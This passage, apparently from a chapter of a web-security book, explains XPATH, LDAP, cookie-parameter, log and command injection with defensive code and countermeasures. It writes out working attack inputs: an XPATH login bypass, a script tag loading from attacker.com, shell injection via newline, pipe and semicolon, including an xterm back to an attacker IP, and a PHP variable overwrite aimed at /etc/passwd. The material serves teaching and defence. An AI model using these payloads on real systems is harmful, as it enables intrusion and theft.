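        "SELECT email, full_name FROM members WHERE email = ?",
        (email,),
    )
    return cur.fetchall()

# Hypothetical in-memory table, for illustration only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE members (email TEXT, full_name TEXT)")
conn.executemany(
    "INSERT INTO members VALUES (?, ?)",
    [("pat@example.com", "Pat O'Berry"), ("sam@example.com", "Sam Lee")],
)

legit = find_member(conn, "pat@example.com")   # one matching row
attack = find_member(conn, "' OR '1'='1")      # treated as a literal string
```

Note that the name O'Berry is stored and returned without any manual escaping, and the classic injection string simply matches no e-mail address.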

One of the most devastating attacks against a web application is a successful SQL injection exploit. These attacks drive to the source of the data manipulated by the application. If the database can be compromised, then an attacker may not need to try brute-force attacks, social engineering, or other techniques to gain unauthorized access and information. It is important to understand how these vulnerabilities can be identified. Otherwise, countermeasures that work against one type of attack may not work against another. In the end, the best defense is to build queries with bound parameters (parameterized statements or prepared statements) in the application and rely on stored procedures in the database where possible.

XPATH Injection

In addition to storing data in an RDBMS, web applications also commonly store data in an XML format. XPATH is the query language used to parse and extract specific data out of XML documents, and by injecting malicious input into an XPATH query, we can alter the logic of the query. This attack is known as XPATH injection. The following example demonstrates how text can be retrieved from a specific element in an XML document using XPATH queries.

Given the XML document:

   <?xml version="1.0" encoding="ISO-8859-1"?>
    <users>
    <admins>
    <user>admin</user>
    <pass>admin123</pass>
    </admins>
    <basic>
    <user>guest</user>
    <pass>guest123</pass>
    </basic>
    </users>

and executing the following code against it:

   Set xmlDoc = CreateObject("Microsoft.XMLDOM")
   xmlDoc.async = False
   xmlDoc.load("users.xml")
   Set nodes = xmlDoc.selectNodes("/users/admins/pass/text()")

the result from the query /users/admins/pass/text() will be admin123.

With this in mind, an attacker can abuse XPATH queries that utilize unvalidated input. Unlike SQL injection, there is no way to comment out parts of the query when using XPATH. Therefore, an attacker must inject additional logic into the query, causing it to return true when it otherwise may have returned false or causing it to return additional data. A dangerous example of how an XPATH injection could be used to bypass authentication is based on the following code:

   string(//users/admins[user/text()='" + txtUser.Text + "'
   and pass/text()='" + txtPass.Text + "'])

If the username input is admin' or 1=1 or 'a'='b and the password is left empty, the query will be:

   string(//users/admins[user/text()='admin' or 1=1 or 'a'='b'
   and pass/text()=''])

The expression

   user/text()='admin' or 1=1 or 'a'='b' and pass/text()=''

can be represented as

   (A OR B) OR (C AND D)

The logical operator AND has higher priority than OR, so (C AND D) is evaluated first, and the whole expression is true whenever A or B is true, irrespective of what (C AND D) returns. Because the injected condition B is 1=1, which is always true, (A OR B) is true. Thus the query returns true and the attacker is able to log in, bypassing the authentication mechanism with XPATH injection.
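The precedence argument can be checked mechanically. The short Python sketch below is only an analogy: Python's and also binds more tightly than or, so the hypothetical login_check function has the same shape as the injected predicate, with B standing in for 1=1.

```python
from itertools import product

def login_check(a, b, c, d):
    # Same shape as the injected predicate: A or B or C and D.
    # As in XPath, "and" binds more tightly than "or".
    return a or b or c and d

# B stands for the injected 1=1, so it is always True.
results = [login_check(a, True, c, d)
           for a, c, d in product([False, True], repeat=3)]
all_true = all(results)
```

Every one of the eight combinations of A, C, and D evaluates to true once B is true, which is why the password comparison never matters.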

XPATH Injection Countermeasures

Like SQL injection, XPATH injection can be prevented by employing proper input validation and parameterized queries. No matter what the application, environment, or language, you should follow these best practices:

• Treat all input as untrusted, especially user input, but even input from your database or the supporting infrastructure.

• Validate not only the type of data but also its format, length, and range (for example, a simple regular expression such as /["*^';&<>()]/ would find suspect special characters).

• Validate data both on the client and the server because client validation is extremely easy to circumvent.

• Test your applications for known threats before you release them.
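As a rough sketch of the format and length checks in the list above, the following Python function accepts only values that match a whitelist pattern. The policy itself (1 to 32 characters drawn from letters, digits, dot, underscore, and hyphen) and the name is_valid_username are assumptions chosen for illustration, not rules taken from any particular application.

```python
import re

# Hypothetical policy: 1-32 characters; letters, digits, dot, underscore, hyphen.
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,32}")

def is_valid_username(value):
    """Return True only if the whole value matches the whitelist pattern."""
    return isinstance(value, str) and USERNAME_RE.fullmatch(value) is not None
```

Because fullmatch must consume the entire string, the injection string from the earlier example is rejected on its first quote character, and an empty or overlong value fails the length check.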

Unlike database servers, XPATH does not support the concept of parameterization. However, parameterization can be mimicked with APIs such as XQuery. The XPATH query can be parameterized by storing it in an external file:

   declare variable $user as xs:string external;
   declare variable $pass as xs:string external;
   //users/user[@user=$user and @password=$pass]

The XQuery code would then look like:

   Document doc = new Builder().build("users.xml");
   XQuery xquery = new XQueryFactory().createXQuery(new File("dologin.xq"));
   Map vars = new HashMap();
   vars.put("user", "admin");
   vars.put("pass", "admin123");
   Nodes results = xquery.execute(doc, null, vars).toNodes();
   for (int i=0; i < results.size(); i++) {
       System.out.println(results.get(i).toXML());
   }

And XQuery would populate the XPATH code with

   "//users/admins[user/text()='" + user + "' and pass/text()='" + pass + "']"

This technique provides solid protection from XPATH injection, although it is not built in to the XPATH specification. The user input is not directly used while forming the query; rather, the query evaluates the value of the element in the XML document, and if it does not match the parameterized value, it fails gracefully.

It is possible to extract an entire XML document through a web application that is vulnerable to XPATH injection attacks. With the increased adoption of techniques such as Ajax, RIA platforms such as Flex or Silverlight, and XML services from organizations such as Google, all of which rely heavily on XML for everything from communication with backend services to persistence, we need to remain vigilant, now more than ever, about the threats and risks created by these approaches.
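Where variable binding is not available, a different way to reach the same goal is to keep the path expression constant and compare the user's values in application code. The Python sketch below uses the standard xml.etree.ElementTree module against a copy of the users document shown earlier; it is a substitute technique, not XQuery parameterization, and the function name is_admin_login is an assumption for the example.

```python
import xml.etree.ElementTree as ET

# Inline copy of the users document from the earlier example.
USERS_XML = """<users>
  <admins><user>admin</user><pass>admin123</pass></admins>
  <basic><user>guest</user><pass>guest123</pass></basic>
</users>"""

def is_admin_login(root, username, password):
    """Check credentials without building a query string from user input."""
    # The path is a constant. User input is only ever compared as data.
    for entry in root.findall("./admins"):
        user = entry.findtext("user", default="")
        stored = entry.findtext("pass", default="")
        if user == username and stored == password:
            return True
    return False

root = ET.fromstring(USERS_XML)
ok = is_admin_login(root, "admin", "admin123")
bypass = is_admin_login(root, "admin' or 1=1 or 'a'='b", "")
```

Because the injected text never becomes part of an expression, the authentication bypass string is simply a username that does not exist.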

LDAP Injection

Another data store that should only accept validated input from an application is an organization’s X.500 directory service, which is commonly queried using the Lightweight Directory Access Protocol (LDAP). An organization allowing unvalidated input in the construction of an LDAP query is exposed to an attack known as LDAP injection. The threat posed allows an attacker to extract important corporate data, such as user account information, from the LDAP tree. By manipulating the filters used to query directory services, an LDAP injection attack can wreak havoc on single sign-on environments that are based on LDAP directories. Consider a site that allows you to query the directory services for an employee’s title and employs a URL such as:

   http://www.megacorp.com/employee.asp?user=jwren

Assume the code behind this page doesn’t validate the input:

   <%@ Language=VBScript %>
   <%
   Dim userName
   Dim filter
   Dim ldapObj
   userName = Request.QueryString("user")
   filter = "(uid=" + CStr(userName) + ")"

   Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
   ldapObj.ServerName = LDAP_SERVER
   ldapObj.DN = "ou=people,dc=megacorp,dc=com"

   ldapObj.SearchFilter = filter

   ldapObj.Search

   While ldapObj.NextResult = 1
   Response.Write("<p>")

   Response.Write("<b><u>User information for: " + ldapObj.AttrValue(0) + "</u></b><br>")
   For i = 0 To ldapObj.AttrCount -1
   Response.Write("<b>" + ldapObj.AttrType(i) + "</b>: " + ldapObj.AttrValue(i) + "<br>")
   Next
   Response.Write("</p>")
   Wend
   %>

Imagine a scenario where a malicious user sends a request to this URL:

   http://www.megacorp.com/employee.asp?user=*

Because * is the LDAP wildcard, the filter becomes (uid=*) and the application displays the information for every user in its response. In another application, entering * for the username may instead return an error message stating that the password has expired. Entering parentheses, (), can reveal the whole LDAP query in the error message, as shown here:

   (&(objectClass=User)(objectCategory=Person)(SamAccountName=
   <username... this is where an attacker could start injecting new filters>)

With this information disclosed, an attacker can see how to concatenate filters onto the query. However, data extraction may only be possible through blind LDAP injection attacks due to the AND query. More information on blind LDAP injection attacks is available in the “References & Further Reading” section at the end of this chapter.

LDAP directory services are critical repositories for managing an organization’s user data. If a compromise occurs, personally identifiable information will almost certainly be exposed, and the compromise may allow for successful authentication bypass attacks. Be sure to review all user input that interacts with LDAP directory services.
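One way to neutralize the filter metacharacters is to escape them before the value is placed in the filter, using the backslash-hex form defined for LDAP search filters in RFC 4515. The Python sketch below is a minimal illustration; the helper names escape_ldap_filter_value and build_uid_filter are assumptions, and a real application would normally also validate the value against a whitelist first.

```python
def escape_ldap_filter_value(value):
    """Escape the characters that are special in an LDAP search filter."""
    replacements = {
        "\\": r"\5c",   # backslash
        "*": r"\2a",    # wildcard
        "(": r"\28",    # filter open
        ")": r"\29",    # filter close
        "\x00": r"\00", # NUL
    }
    return "".join(replacements.get(ch, ch) for ch in value)

def build_uid_filter(user_name):
    # Same filter shape as the vulnerable page, but with the value escaped.
    return "(uid=" + escape_ldap_filter_value(user_name) + ")"
```

With this in place, a request for user=* searches for a uid that is literally an asterisk instead of matching every entry.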

Custom Parameter Injection

Applications that employ custom delimiters or proprietary formats in their parameters are still subject to injection attacks. An attacker simply needs to determine the pattern or appropriate sequence of characters to tamper with the parameter. An application that utilizes custom parameters when storing information on the user’s access privileges is exposed to this type of parameter injection with the consequence of escalated privileges. A real-world example of this can be found in cookies that store sequences of user data like this:

   TOKEN^2|^399203|^2106|^2108|^Admin,0|400,Jessica^202|13197^203|15216

In this case the ^ character indicates the start of a parameter and the | character indicates the end. Although this application has custom code to parse these parameters on the backend, it is susceptible to attackers sending their own values for these parameters to alter the application’s behavior. In the previous example, an attacker may try to alter the corresponding Admin value from a 0 to a 1 in an attempt to gain Admin privileges, as would be possible when the following code is used:

   int admin = 0;
   string token = Request.Cookies["TOKEN"].Value;
   // Custom cookie parsing logic sets admin from the token
   if (admin == 1) {
   // Set user role to administrator
   }

After tampering with the custom parameters in the TOKEN cookie, a malicious user will perform differential analysis on the resulting application behavior to determine if the tampering was effective. An attacker may attempt to change the name from Jessica to another username to determine if that changes the displayed welcome message. For instance:

   Welcome, Jessica

may be altered to

   Welcome, <script src="http://attacker.com/malcode.js">

Custom parameter injection may be leveraged to launch other injection attacks on an application as well. The same rules of proper input validation need to be applied to custom parsing code throughout an application. Be sure to review the rules applied through proper format, type, length, and range checks. Otherwise, the application may fall victim to an unexpected custom parameter injection, in which the risk is as high as the level of sensitivity of the data handled by the custom parser.
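The checks might look something like the following Python sketch, which validates two fields after a custom parser has already split them out of the cookie. The parser itself is not shown, and the function name validate_token_fields, the allowed name pattern, and the 32-character limit are all assumptions made for illustration.

```python
import re

# Hypothetical display-name policy: starts with a letter, at most 32
# characters, and no markup characters such as < > or double quotes.
NAME_RE = re.compile(r"[A-Za-z][A-Za-z0-9 .'-]{0,31}")

def validate_token_fields(admin_raw, name_raw):
    """Validate two fields already extracted by a custom cookie parser."""
    # Type and range: the flag must be exactly "0" or "1".
    if admin_raw not in ("0", "1"):
        raise ValueError("admin flag out of range")
    # Format and length: a short display name matching the whitelist.
    if NAME_RE.fullmatch(name_raw) is None:
        raise ValueError("name has unexpected format")
    return int(admin_raw), name_raw
```

Passing these checks only shows that a value is well formed. Whether the user is actually entitled to the administrator role still has to be decided from data the client cannot modify.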

Log Injection

Developers need to consider the risk of reading and writing application logs if they’re not sanitizing and validating input before it reaches the log. Logs that are susceptible to injection may have been compromised by a malicious user to cover the tracks of a successful attack with misleading entries. This is also known as a repudiation attack. An application that does not securely log users’ actions may be vulnerable to users disclaiming an action. Imagine an application that logs requests in this format:

   Date, Time, Username, ID, Source IP, Request

The parameters come directly from the request with no input validation:

   Cookie: PHPSESSID=pltmp1obqfig09bs9gfeersju3; username=sdr; id=Justin

An attacker may then modify the id parameter to fill the log with erroneous entries:

   Cookie: PHPSESSID=pltmp1obqfig09bs9gfeersju3; username=sdr; id=
   [FAKE ENTRY]

On some platforms, if the log does not properly escape null bytes, the remainder of a string that should be logged may not be recorded. For instance:

   Cookie: PHPSESSID=pltmp1obqfig09bs9gfeersju3; username=sdr; id=%00

may result in that individual log entry stopping at the id field:

   Date, Time, Username, ...

A real-world example of log injection occurred with the popular SSHD monitoring tool DenyHosts. DenyHosts monitors SSH logs and dynamically blocks the source IP address of a connection that produces too many authentication failures. Version 2.6 is vulnerable to a log injection attack that can lead to a denial of service (DoS) of the SSH service. Because users are allowed to specify the username that gets logged, an attacker can insert any user he or she wants into the /etc/hosts.deny file, which controls access to SSH. By specifying all users, the attacker creates a complete lockdown of the SSH service on the machine, preventing anyone outside the box from connecting. More information on this log injection vulnerability can be found at http://www.ossec.net/main/attacking-log-analysis-tools.

All logs and monitoring systems should require strict validation to prevent an attack that truncates entries leading to information loss. The most serious type of log injection attacks would allow the system used to monitor the logs to be compromised, making incident response especially difficult if there is no evidence of what types of attacks were performed.
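A minimal Python sketch of such validation follows. It assumes the comma-separated, one-entry-per-line format shown earlier and escapes anything that could forge a separator, start a new line, or truncate the entry; the function names, the 256-character limit, and the \xNN escape notation are choices made for this example.

```python
def sanitize_log_field(value, max_len=256):
    """Make one field safe for a single-line, comma-separated log entry."""
    out = []
    for ch in value[:max_len]:
        # Escape the escape character, the field separator, and all
        # control characters (including CR, LF, and the null byte).
        if ch == "\\" or ch == "," or ord(ch) < 0x20 or ord(ch) == 0x7F:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)

def format_entry(date, time, username, user_id, source_ip, request):
    fields = [date, time, username, user_id, source_ip, request]
    return ", ".join(sanitize_log_field(f) for f in fields)
```

An id value that contains a line break and a fabricated entry is then written as visible escape sequences inside the original entry rather than as a second log line.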

Command Execution

Many attacks only result in information disclosure such as database columns, application source code, or arbitrary file contents. Command execution is a common goal for an attack because command-line access (or a close equivalent) quickly leads to a full compromise of the web server and possibly other systems on its local network.

Newline Characters

The newline character, %0a in its hexadecimal incarnation, is a useful character for arbitrary command execution. On Unix systems, less secure CGI scripts (such as any script written in a shell language) will interpret the newline character as an instruction to execute a new command.

For example, the administration interface for one service provider’s banking platform is written in the Korn Shell (ksh). One function of the interface is to call an internal “analyze” program to collect statistics for the several dozen banking web sites it hosts. The GET request looks like URL/analyze.sh?-t+24&-i. The first test is to determine if arbitrary variables can be passed to the script. Sure enough, URL/analyze.sh?-h returns the help page for the “analyze” program. The next step is command execution: URL/analyze.sh?-t%0a/bin/ls%0a. This returns a directory listing on the server (using the ls command). At this point, we have the equivalent of command-line access on the server. Keep in mind, however, that the level of access gained is only equivalent to the privileges that have been accorded to the shell script.

Ampersand, Pipe, and Semicolon Characters

One of the important techniques in command injection attacks is finding the right combination of command separation characters. Both Windows and Unix-based systems accept some subset of the ampersand, pipe, and semicolon characters.

The pipe character (| or URL-encoded as %7c) can be used to chain both Unix and Windows commands. The Perl-based AWStats application (http://awstats.sourceforge.net/) provides a good example of using pipe characters with command execution. Versions of AWStats below 6.5 are vulnerable to a command injection exploit in the configdir parameter of the awstats.pl file. The following is an example of the exploit syntax:

   http://website/awstats/awstats.pl?configdir=|command|

where command may be any valid Unix command. For example, you could download and execute exploit code or use netcat to send a reverse shell. The pipe characters are necessary to create a valid argument for the Perl open() function used in the awstats.pl file.

The semicolon (; or URL-encoded as %3b) is the easiest character to use for command execution on Unix systems. The semicolon is used to separate multiple commands on a single command line, so it can sometimes trick Unix-based scripts into running an injected command. The ampersand (& or URL-encoded as %26) does the same on Windows. The test is executed by appending the semicolon, followed by the command to run, to the field value. For example:

   command1; command2; command3

The next example demonstrates how modifying an option value in the drop-down menu of a form leads to command execution. Normally, the application expects an eight-digit number when the user selects one of the menu choices in the arcfiles.html page. The page itself is not vulnerable, but its HTML form sends POST data to a CGI program named view.sh. The “.sh” suffix sets off the input validation alarms, especially command execution, because Unix shell scripts are about the worst choice possible for a secure CGI program. In the HTML source code displayed in the user’s browser, one of the option values appears as:

   <option value = "24878478" > Acme Co.

The form method is POST. We could go through the trouble of setting up a proxy tool like Paros and modifying the data before the POST request reaches the server. Instead, we save the file to our local computer and modify the line to execute an arbitrary command (the attacker’s IP address is 10.0.0.42). Our command of choice is to display a terminal window from the web server onto our own client. Of course, both the client and server must support the X Window System. We craft the command and set the new value in the arcfiles.html page we have downloaded on our local computer:

   <option value = "24878478; xterm -display 10.0.0.42:0.0" > Acme Co.

Next, we open the copy of arcfiles.html that’s on our local computer and select “Acme Co.” from the drop-down menu. The Unix-based application receives the eight-digit option value and passes it to the view.sh file, but the argument also contains a semicolon. The CGI script, written for the Bourne shell, parses the eight-digit option as normal and moves on to the next command in the string. If everything goes as planned, an xterm pops up on our console and we have instant command-line access on the victim machine.

The ampersand character (& or URL-encoded as %26) can also be used to execute commands. Normally, this character is used as a delimiter for arguments on the URL. However, with simple URL encoding, ampersands can be submitted within variables. Big Brother, a shell-based application for monitoring systems, has had several vulnerabilities. Bugtraq ID 1779 describes arbitrary command execution with the ampersand character.
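A defensive counterpart to the arcfiles example can be sketched in Python: check that the value is exactly eight digits, then pass it to the external program as a separate argument so that no shell ever parses it. The function name view_archive is an assumption, and a child Python process that echoes its argument stands in for the real viewer program.

```python
import re
import subprocess
import sys

ARCHIVE_ID_RE = re.compile(r"[0-9]{8}")

def view_archive(archive_id):
    # Whitelist check: exactly eight digits, nothing else.
    if ARCHIVE_ID_RE.fullmatch(archive_id) is None:
        raise ValueError("archive id must be exactly eight digits")
    # Hypothetical stand-in for the real viewer: a child Python process
    # that echoes its argument. The list form hands each argument
    # directly to the program, so separators such as ; | & or a newline
    # are never interpreted by a shell.
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", archive_id]
    done = subprocess.run(argv, capture_output=True, text=True, check=True)
    return done.stdout.strip()
```

The tampered option value containing the xterm command fails the whitelist check before any process is started, and even a value that slipped past the check would reach the program as a single literal argument.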

Encoding Abuse

As we noted in Chapter 1, URL syntax is defined in RFC 3986 (see “References & Further Reading” for a link). The RFC also defines numerous ways to encode URL characters so they appear radically different but mean exactly the same thing. Attackers have exploited this flexibility frequently over the history of the Web to formulate increasingly sophisticated techniques for bypassing input validation. Table 6-4 lists the most common encoding techniques employed by attackers along with some examples.

Table 6-4 Common URL Encoding Techniques Used by Attackers

PHP Global Variables

The overwhelming majority of this chapter presents techniques that are effective against web applications regardless of their programming language or platform. Different application technologies are neither inherently more secure nor less secure than their peers. Inadequate input validation is predominantly an issue that occurs when developers are not aware of the threats to a web application or underestimate how applications are exploited.

Nevertheless, some languages introduce features whose misuse or misunderstanding contributes to an insecure application. PHP has one such feature in its use of superglobals. A superglobal variable has the highest scope possible and is consequently accessible from any function or class in a PHP file. The four most common superglobal variables are $_GET, $_POST, $_COOKIE, and $_SESSION. Each of these variables contains an associative array of parameters. For example, the data sent via a form POST are stored as name/value pairs in the $_POST variable. It’s also possible to create custom superglobal variables using the $GLOBALS variable.

A superglobal variable that is not properly initialized in an application can be overwritten by values sent as a GET or POST parameter. This is true for array values that are expected to come from user-supplied input, as well as values not intended for manipulation. For example, a config array variable might have an entry for root_dir. If config is registered as a global PHP variable, then it might be possible to attack it with a request that writes a new value:

   http://www.website.com/page.php?config[root_dir]=/etc/passwd%00

PHP will take the config[root_dir] argument and supply the new value—one that was surely not expected to be used in the application.

Determining the name of global variables without access to source code is not always easy; however, other techniques rely on sending GET parameters via a POST (or vice versa) to see if the submission bypasses an input validation filter.

More information is found at the Hardened PHP Project site, http://www.hardened-php.net/. See specifically http://www.hardened-php.net/advisory_172005.75.html and http://www.hardened-php.net/advisory_202005.79.html.

Common Side-effects

Input validation attacks do not have to result in application compromise. They can also help identify platform details from verbose error messages, reveal database schema details for SQL injection exploits, or merely identify whether an application is using adequate input filters.

Verbose Error Messages

This is not a specific type of attack but will be the result of many of the aforementioned attacks. Informational error messages may contain complete paths and filenames, variable names, SQL table descriptions, servlet errors (including which custom and base servlets are in use), database errors, or other information about the application and its environment.

COMMON COUNTERMEASURES

We’ve already covered several countermeasures during our discussion of input validation attacks. However, it’s important to reiterate several key points to stopping these attacks:

Use client-side validation for performance, not security. Client-side input validation mechanisms prevent innocent input errors and typos from reaching the server. This preemptive validation step can reduce the load on a server by preventing unintentionally bad data from reaching the server. A malicious user can easily bypass client-side validation controls, so they should always be complemented with server-side controls.

Normalize input values. Many attacks have dozens of alternate encodings based on character sets and hexadecimal representation. Input data should be canonicalized before security and validation checks are applied to them. Otherwise, an encoded payload may pass a filter only to be decoded as a malicious payload at a later step. This step also includes measures taken to canonicalize file- and pathnames.

Apply server-side input validation. All data from the web browser can be modified with arbitrary content. Therefore, proper input validation must be done on the server, where it is not possible to bypass validation functions.

Constrain data types. The application shouldn’t even deal with data that don’t meet basic type, format, and length requirements. For example, numeric values should be assigned to numeric data structures and string values should be assigned to string data structures. Furthermore, a U.S. ZIP code field should accept only numeric values that are exactly five digits long (or that follow the “ZIP plus four” format).

Use secure character encoding and “output validation.” Characters used in HTML and SQL formatting should be encoded in a manner that will prevent the application from misinterpreting them. For example, present angle brackets in their HTML-encoded form (&lt; and &gt;). This type of output validation or character reformatting serves as an additional layer of security against HTML injection attacks. Even if a malicious payload successfully passes through an input filter, its effect is negated at the output stage.

Make use of white lists and black lists. Use regular expressions to match data for authorized or unauthorized content. White lists contain patterns of acceptable content. Black lists contain patterns of unacceptable or malicious content. It’s typically easier (and better advised) to rely on white lists because the set of all malicious content to be blocked is potentially unbounded. Also, you can only create blacklist patterns for known attacks; new attacks will fly by with impunity. Still, having a black list of a few malicious constructs like those used in simple SQL injection and cross-site scripting attacks is a good idea.


TIP

Some characters have multiple methods of reference (so-called entity notations): named, decimal, hexadecimal, and UTF-8 (Unicode); for more on entity encoding as it relates to browser security see http://code.google.com/p/browsersec/wiki/Part1#HTML_entity_encoding.


Securely handle errors. Regardless of what language is used to write the application, error handling should follow the concept of try, catch, finally exception handling. Try an action; catch specific exceptions that the action may cause; finally exit nicely if all else fails. This also entails a generic, polite error page that does not contain any system information.

Require authentication. In some cases, it may make sense to configure the server to require proper authentication at the directory level for all files within that directory.

Use least-privilege access. Run the web server and any supporting applications as an account with the least permissions possible. The risk to an application susceptible to arbitrary command execution that cannot access the /sbin directory (where many Unix administrator tools are stored) is lower than the risk to a similar application that can execute commands in the context of the root user.
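Several of these points can be combined in one short Python sketch: canonicalize the input, validate it against a whitelist, and encode it on output. The function names, the limit of five decoding rounds, and the decision to decode repeatedly at all are assumptions for illustration; whether multiple decoding passes are appropriate depends on how the rest of the application handles the value.

```python
import html
import re
from urllib.parse import unquote

# Whitelist: five digits, optionally followed by a hyphen and four digits.
ZIP_RE = re.compile(r"[0-9]{5}(-[0-9]{4})?")

def canonicalize(value, max_rounds=5):
    """URL-decode repeatedly until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many layers of encoding")

def clean_zip(raw):
    # Canonicalize first, then validate the decoded form.
    value = canonicalize(raw)
    if ZIP_RE.fullmatch(value) is None:
        raise ValueError("not a ZIP or ZIP plus four code")
    return value

def render_greeting(name):
    # Output encoding: markup characters are shown, not interpreted.
    return "Welcome, " + html.escape(name)
```

A doubly encoded payload is reduced to its plain form before the whitelist sees it, and a script tag that reaches the greeting is rendered as harmless text.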

SUMMARY

Malicious input attacks target parameter values that the application does not adequately parse. Inadequate parsing may be due to indiscriminate acceptance of user-supplied data, reliance on client-side validation filters, or an expectation that nonform data will not be manipulated. Once an attacker identifies a vector, then a more serious exploit may follow. Exploits based on poor input validation include buffer overflows, arbitrary file access, social engineering attacks, SQL injection, and command injection. Input validation routines are no small matter and are ignored at the application’s peril.

Here are some vectors for discovering inadequate input filters:

• Each argument of a GET request

• Each argument of a POST request

• Forms (e-mail address, home address, name, comments)

• Search fields

• Cookie values

• Browser environment values (user agent, IP address, operating system, etc.)

Additionally, Table 6-5 lists several characters and their URL encoding that quite often represent a malicious payload or otherwise represent some attempt to generate an error or execute a command. These characters alone do not necessarily exploit the application, nor are they always invalid; however, where these characters are not expected by the application, then a little patience can often turn them into an exploit.

Table 6-5 Popular Characters to Test Input Validation

REFERENCES & FURTHER READING
